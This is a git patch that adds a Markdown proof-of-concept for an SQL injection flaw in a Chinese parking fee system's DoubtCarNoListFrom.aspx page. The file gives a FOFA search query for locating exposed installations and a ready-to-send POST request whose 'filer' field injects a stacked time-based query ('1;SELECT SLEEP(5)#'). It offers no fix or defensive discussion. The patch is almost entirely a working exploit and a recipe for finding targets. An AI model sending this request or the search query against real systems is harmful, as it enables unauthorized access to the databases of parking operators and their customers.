From 27899609277a6544af07d15063bd8e1d5b82116b Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 18 May 2024 19:43:41 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=A7=91=E6=8B=93=E5=85=A8=E6=99=BA?= =?UTF-8?q?=E8=83=BD=E5=81=9C=E8=BD=A6=E6=94=B6=E8=B4=B9=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?DoubtCarNoListFrom.aspx=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md diff --git a/科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md b/科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..a4b6b1a --- /dev/null +++ b/科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞 + +## fofa +``` +body="/KT_Css/qd_defaul.css" +``` + +## poc +``` +POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Content-Type: application/x-www-form-urlencoded +Connection: close + +start=0&limit=20&filer=1;SELECT SLEEP(5)# +```